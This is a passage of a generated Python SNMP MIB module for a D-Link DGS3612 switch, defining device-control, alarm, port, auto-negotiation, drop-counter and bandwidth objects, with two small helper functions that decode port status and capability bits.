swL2DevCtrlIpAutoconfig = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlIpAutoconfig.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlIpAutoconfig.setDescription('')
swL2DevCtrlLedPOEState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlLedPOEState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlLedPOEState.setDescription('When set to enabled(1), the PoE LED is lit. When set to disabled(2), the Link/ACT/Speed LED is lit.')
swL2DevCtrlClipagingState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlClipagingState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlClipagingState.setDescription('')
swL2DevCtrlLLDPState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 18), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlLLDPState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlLLDPState.setDescription('Specifies the state of the LLDP function. When this function is enabled, the switch can start to transmit LLDP packets and to receive and process LLDP packets. The specific behaviour of each port depends on the per-port LLDP setting. For the advertisement of LLDP packets, the switch announces its information to its neighbors through its ports. For the reception of LLDP packets, the switch learns the information advertised by its neighbors and records it in the neighbor table.')
swL2DevCtrlLLDPForwardMessageState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 19), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlLLDPForwardMessageState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlLLDPForwardMessageState.setDescription('When LLDP is disabled and LLDP forward message is enabled, the LLDP Data Unit packets received by the switch will be forwarded.')
swL2DevCtrlVLANTrunkState = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 2, 22), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevCtrlVLANTrunkState.setStatus('current')
if mibBuilder.loadTexts: swL2DevCtrlVLANTrunkState.setDescription('This indicates the global state of the VLAN trunking feature of the device.')
swL2DevAlarm = MibIdentifier((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3))
swL2DevAlarmNewRoot = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevAlarmNewRoot.setStatus('current')
if mibBuilder.loadTexts: swL2DevAlarmNewRoot.setDescription('When the device has become the new root of the Spanning Tree, this object decides whether to send a new root trap.')
swL2DevAlarmTopologyChange = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevAlarmTopologyChange.setStatus('current')
if mibBuilder.loadTexts: swL2DevAlarmTopologyChange.setDescription('This object determines whether to send a trap when the switch topology changes. If the object is enabled(3), the topologyChange trap is sent by the device when any of its configured ports transitions from the Learning state to the Forwarding state, or from the Forwarding state to the Blocking state. For the same port transition, the device does not send the trap if the value of this object is disabled or other.')
swL2DevAlarmLinkChange = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 1, 3, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3))).clone(namedValues=NamedValues(("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2DevAlarmLinkChange.setStatus('current')
if mibBuilder.loadTexts: swL2DevAlarmLinkChange.setDescription('This object determines whether to send a trap when a link changes. If the object is enabled(3), the Link Change trap is sent by the device when the link of any of its ports changes. The device does not send the trap if the value of this object is disabled or other.')
swL2MultiFilterTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1), )
if mibBuilder.loadTexts: swL2MultiFilterTable.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterTable.setDescription('A table that contains information about the VLAN multicast filter mode.')
swL2MultiFilterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2MultiFilterVid"))
if mibBuilder.loadTexts: swL2MultiFilterEntry.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterEntry.setDescription('A list of multicast filter mode information for each VLAN.')
swL2MultiFilterVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2MultiFilterVid.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterVid.setDescription('The VLAN ID of each VLAN.')
swL2MultiFilterMode = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("forward-all-groups", 1), ("forward-unregistered-groups", 2), ("filter-unregistered-groups", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2MultiFilterMode.setStatus('current')
if mibBuilder.loadTexts: swL2MultiFilterMode.setDescription('The VLAN multicast filter mode.')
swL2PortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1), )
if mibBuilder.loadTexts: swL2PortInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoTable.setDescription('A table that contains information about every port.')
swL2PortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortInfoPortIndex"), (0, "DGS3612-L2MGMT-MIB", "swL2PortInfoMediumType"))
if mibBuilder.loadTexts: swL2PortInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoEntry.setDescription('A list of information for each port of the device.')
swL2PortInfoPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoPortIndex.setDescription("This object indicates the module's port number (1..max port number in the module).")
swL2PortInfoMediumType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("copper", 1), ("fiber", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoMediumType.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoMediumType.setDescription('Indicates the medium type of the port.')
swL2PortInfoUnitID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoUnitID.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoUnitID.setDescription('Indicates the ID of the unit in the system.')
swL2PortInfoType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("portType-none", 0), ("portType-100Base-T", 2), ("portType-100Base-X", 3), ("portType-1000Base-T", 4), ("portType-1000Base-X", 5), ("portType-10GBase-R", 6), ("portType-10GBase-CX4", 7), ("portType-SIO", 8), ("portType-module-empty", 9), ("portType-user-last", 10)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoType.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoType.setDescription('This object indicates the connector type of this port.')
swL2PortInfoLinkStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("link-pass", 2), ("link-fail", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoLinkStatus.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoLinkStatus.setDescription('This object indicates the port link status.')
swL2PortInfoNwayStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18))).clone(namedValues=NamedValues(("link-down", 0), ("full-10Mbps-8023x", 1), ("full-10Mbps-none", 2), ("half-10Mbps-backp", 3), ("half-10Mbps-none", 4), ("full-100Mbps-8023x", 5), ("full-100Mbps-none", 6), ("half-100Mbps-backp", 7), ("half-100Mbps-none", 8), ("full-1Gigabps-8023x", 9), ("full-1Gigabps-none", 10), ("half-1Gigabps-backp", 11), ("half-1Gigabps-none", 12), ("full-10Gigabps-8023x", 13), ("full-10Gigabps-none", 14), ("half-10Gigabps-8023x", 15), ("half-10Gigabps-none", 16), ("empty", 17), ("err-disabled", 18)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoNwayStatus.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoNwayStatus.setDescription('This object indicates the port speed and duplex mode.')
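# Illustrative sketch: translating a swL2PortInfoNwayStatus value into its
# duplex/speed/flow-control components, taken directly from the enumeration
# declared above. Pure Python; no device access required.
_NWAY_STATUS = {
    0: 'link-down', 1: 'full-10Mbps-8023x', 2: 'full-10Mbps-none',
    3: 'half-10Mbps-backp', 4: 'half-10Mbps-none', 5: 'full-100Mbps-8023x',
    6: 'full-100Mbps-none', 7: 'half-100Mbps-backp', 8: 'half-100Mbps-none',
    9: 'full-1Gigabps-8023x', 10: 'full-1Gigabps-none',
    11: 'half-1Gigabps-backp', 12: 'half-1Gigabps-none',
    13: 'full-10Gigabps-8023x', 14: 'full-10Gigabps-none',
    15: 'half-10Gigabps-8023x', 16: 'half-10Gigabps-none',
    17: 'empty', 18: 'err-disabled',
}

def exampleParseNwayStatus(value):
    name = _NWAY_STATUS.get(int(value), 'unknown')
    parts = name.split('-')
    if len(parts) == 3:                   # e.g. 'full-100Mbps-8023x'
        return {'duplex': parts[0], 'speed': parts[1], 'flowControl': parts[2]}
    return {'state': name}                # link-down / empty / err-disabled

# e.g. exampleParseNwayStatus(5)
# -> {'duplex': 'full', 'speed': '100Mbps', 'flowControl': '8023x'}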
swL2PortInfoErrDisReason = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("err-none", 1), ("storm-control", 2), ("lbd-control", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoErrDisReason.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoErrDisReason.setDescription('This object indicates whether the port is disabled and, if so, the error-disable reason.')
swL2PortCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2), )
if mibBuilder.loadTexts: swL2PortCtrlTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlTable.setDescription('A table that contains control information about every port.')
swL2PortCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortCtrlPortIndex"), (0, "DGS3612-L2MGMT-MIB", "swL2PortCtrlMediumType"))
if mibBuilder.loadTexts: swL2PortCtrlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlEntry.setDescription('A list of control information for each port of the device.')
swL2PortCtrlPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlPortIndex.setDescription("This object indicates the module's port number (1..max port number in the module).")
swL2PortCtrlMediumType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("copper", 1), ("fiber", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlMediumType.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlMediumType.setDescription('Indicates the medium type of the port.')
swL2PortCtrlUnitIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlUnitIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlUnitIndex.setDescription('Indicates the ID of the unit in the device.')
swL2PortCtrlAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlAdminState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlAdminState.setDescription('This object decides whether the port is enabled or disabled.')
swL2PortCtrlNwayState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 8, 9, 10))).clone(namedValues=NamedValues(("other", 1), ("nway-enabled", 2), ("nway-disabled-10Mbps-Half", 3), ("nway-disabled-10Mbps-Full", 4), ("nway-disabled-100Mbps-Half", 5), ("nway-disabled-100Mbps-Full", 6), ("nway-disabled-1Gigabps-Full", 8), ("nway-disabled-1Gigabps-Full-master", 9), ("nway-disabled-1Gigabps-Full-slave", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlNwayState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlNwayState.setDescription('Chooses the port speed, duplex mode, and N-Way function mode.')
swL2PortCtrlFlowCtrlState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlFlowCtrlState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlFlowCtrlState.setDescription('The flow control mechanism is different between full duplex mode and half duplex mode. For half duplex mode, the jamming signal is asserted. For full duplex mode, IEEE 802.3x flow control function sends PAUSE frames and receives PAUSE frames.')
swL2PortCtrlLockState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlLockState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlLockState.setDescription('This object decides whether the port is locked.')
swL2PortCtrlMACNotifyState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlMACNotifyState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlMACNotifyState.setDescription("This object sets each port's MAC notification state.")
swL2PortCtrlAutoNegRestart = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("restart", 1), ("norestart", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlAutoNegRestart.setReference('[IEEE802.3], 30.6.1.2.1, acAutoNegRestartAutoConfig.')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegRestart.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegRestart.setDescription('If the value of this object is set to restart(1) then this will force auto-negotiation to begin link renegotiation. If auto-negotiation signaling is disabled, a write to this object has no effect. Setting the value of this object to norestart(2) has no effect.')
swL2PortCtrlAutoNegCapAdvertisedBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 12), IANAifMauAutoNegCapBits()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlAutoNegCapAdvertisedBits.setReference('[IEEE802.3], 30.6.1.1.6, aAutoNegAdvertisedTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegCapAdvertisedBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegCapAdvertisedBits.setDescription('A value that uniquely identifies the set of capabilities advertised by the local auto-negotiation entity. Capabilities in this object that are not available in swL2PortAutoNegInfoCapabilityBits cannot be enabled. Note that the local auto-negotiation entity may advertise some capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortCtrlJumboFrame = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlJumboFrame.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlJumboFrame.setDescription("This object configures the switch's jumbo frame setting.")
swL2PortCtrlJumboFrameMaxSize = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlJumboFrameMaxSize.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlJumboFrameMaxSize.setDescription("This object indicates the switch's maximum jumbo frame size.")
swL2PortAutoNegInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8), )
if mibBuilder.loadTexts: swL2PortAutoNegInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoTable.setDescription("A table that contains information about every port's auto negotiation status.")
swL2PortAutoNegInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortAutoNegInfoPortIndex"))
if mibBuilder.loadTexts: swL2PortAutoNegInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoEntry.setDescription('A list of auto-negotiation information for each port of the device.')
swL2PortAutoNegInfoPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoPortIndex.setDescription("This object indicates the module's port number (1..max port number in the module).")
swL2PortAutoNegInfoAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoAdminStatus.setReference('[IEEE802.3], 30.6.1.1.2, aAutoNegAdminState, and 30.6.1.2.2, acAutoNegAdminControl.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoAdminStatus.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoAdminStatus.setDescription('If the value of this object is disabled(2), the interface will act as it would if it had no auto-negotiation signaling. The status is affected by setting swL2PortCtrlNwayState.')
swL2PortAutoNegInfoCapabilityBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 3), IANAifMauAutoNegCapBits()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapabilityBits.setReference('[IEEE802.3], 30.6.1.1.5, aAutoNegLocalTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapabilityBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapabilityBits.setDescription('A value that uniquely identifies the set of capabilities of the local auto-negotiation entity. Note that the local auto-negotiation entity may support some capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortAutoNegInfoCapAdvertisedBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 4), IANAifMauAutoNegCapBits()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapAdvertisedBits.setReference('[IEEE802.3], 30.6.1.1.6, aAutoNegAdvertisedTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapAdvertisedBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapAdvertisedBits.setDescription('A value that uniquely identifies the set of capabilities advertised by the local auto-negotiation entity. Capabilities in this object that are not available in swL2PortAutoNegInfoCapabilityBits cannot be enabled. Note that the local auto-negotiation entity may advertise some capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortAutoNegInfoCapReceivedBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 5), IANAifMauAutoNegCapBits()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapReceivedBits.setReference('[IEEE802.3], 30.6.1.1.7, aAutoNegReceivedTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapReceivedBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapReceivedBits.setDescription('A value that uniquely identifies the set of capabilities received from the remote auto-negotiation entity. Note that interfaces that support this MIB may be attached to remote auto-negotiation entities that have capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
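# Illustrative sketch: expanding an IANAifMauAutoNegCapBits value (a BITS
# construct carried as an OCTET STRING) into the capability names enumerated
# near the top of this module. By the SNMP BITS convention, bit 0 is the most
# significant bit of the first octet.
_AUTONEG_CAP_BITS = [
    'bOther', 'b10baseT', 'b10baseTFD', 'b100baseT4', 'b100baseTX',
    'b100baseTXFD', 'b100baseT2', 'b100baseT2FD', 'bFdxPause', 'bFdxAPause',
    'bFdxSPause', 'bFdxBPause', 'b1000baseX', 'b1000baseXFD', 'b1000baseT',
    'b1000baseTFD',
]

def exampleDecodeAutoNegCaps(octets):
    caps = []
    for bit, name in enumerate(_AUTONEG_CAP_BITS):
        byteIndex, bitInByte = divmod(bit, 8)
        if byteIndex < len(octets) and octets[byteIndex] & (0x80 >> bitInByte):
            caps.append(name)
    return caps

# e.g. exampleDecodeAutoNegCaps(bytes([0b01100000, 0b00000000]))
# -> ['b10baseT', 'b10baseTFD']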
swL2PortDropCounterTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9), )
if mibBuilder.loadTexts: swL2PortDropCounterTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortDropCounterTable.setDescription('A table that contains information for each port drop counter.')
swL2PortDropCounterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortDropCounterPortIndex"))
if mibBuilder.loadTexts: swL2PortDropCounterEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortDropCounterEntry.setDescription('A list of drop counter information for each port of the device.')
swL2PortDropCounterPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortDropCounterPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortDropCounterPortIndex.setDescription("This object indicates the module's port number (1..max port number in the module).")
swL2PortBufferFullDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortBufferFullDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortBufferFullDrops.setDescription('The total number of packets discarded because the buffer was full.')
swL2PortACLDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortACLDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortACLDrops.setDescription('The total number of packets denied by ACLs.')
swL2PortMulticastDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortMulticastDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortMulticastDrops.setDescription('The total number of multicast packets discarded.')
swL2PortVLANIngressDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortVLANIngressDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortVLANIngressDrops.setDescription('The total number of packets discarded by VLAN ingress checking.')
swL2QOSBandwidthControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1), )
if mibBuilder.loadTexts: swL2QOSBandwidthControlTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthControlTable.setDescription('A table that contains bandwidth control information for each port.')
swL2QOSBandwidthControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOSBandwidthPortIndex"))
if mibBuilder.loadTexts: swL2QOSBandwidthControlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthControlEntry.setDescription('A list of information contained in swL2QOSBandwidthControlTable.')
swL2QOSBandwidthPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSBandwidthPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthPortIndex.setDescription('Indicates the port.')
swL2QOSBandwidthRxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(64, 10000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSBandwidthRxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthRxRate.setDescription('Indicates the RX rate (in units of 1 Kbit/sec) of the specified port. The value 10000000 means no limit.')
